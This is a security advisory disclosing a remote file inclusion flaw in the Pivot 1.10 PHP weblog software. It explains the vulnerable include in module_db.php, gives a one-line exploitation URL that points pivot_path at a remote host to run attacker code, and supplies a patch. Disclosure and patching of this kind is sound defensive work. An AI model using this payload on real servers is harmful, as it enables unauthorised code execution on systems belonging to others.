Pivot 1.10 Soundwave is susceptible to a remote file inclusion and execution vulnerability that enables a remote attacker to execute anything they want in the context of the user id running the web server.
bc31d33c1db4f1dcd9a4ae2f956fc02dbd2c9d2de27d2c22695f954c79bf9233
Pivot 1.10 Soundwave - Remote Code Execution
--------------------------------------------
loofus - 0x90.org
Greets:
-------
Downbload, nummish, peace, war-cow & the rest of 0x90.org
Description:
------------
Pivot is a tool to create weblogs, without the need of a database. Pivot is
easy to setup, easy to maintain and even easier to work with. All data is
stored using flat files. MySQL or other databases are not required, just
plain PHP.
Vulnerability:
--------------
The vulnerability is a remote file inclusion (hmm been seeing too many of
these lately). Anywas, the vulnerability lies within a class file called
module_db.php which is accessible individually. By supplying a malicious
path variable the attack, is able to include any file he/she wishes and is
able to include remote php code allowing local system access as whatever
user PHP is runs scripts as most likely www-data.
--- module_db.php ---
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";
class db {
--- module_db.php ---
No check is done on module_db.php as it is assumed that noone will actually
individually visit this file as it contains a class interface. The idea
behind this is to include this file somewhere else within the code execution
so that $pivot_path is properly set. However if register_globals is set to
on within php.ini the attacker is able to hijack the variable $pivot_path
and point it to somewhere else ("http://xxxxx/includes/module_db_xml.php").
Exploitation:
-------------
http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx
Fix:
----
--- module_db.php Wed Feb 11 16:29:04 2004
+++ module_db.phpfix Fri May 28 22:36:07 2004
@@ -10,6 +10,10 @@
// Patch to fix remote include - loofus (0x90)
// ---------------------------------------------------------------------------
+/* Make sure user cannot include remote files */
+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||
isset($_COOKIE['pivot_path']))
+ die("No remote include for you!\n");
+
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";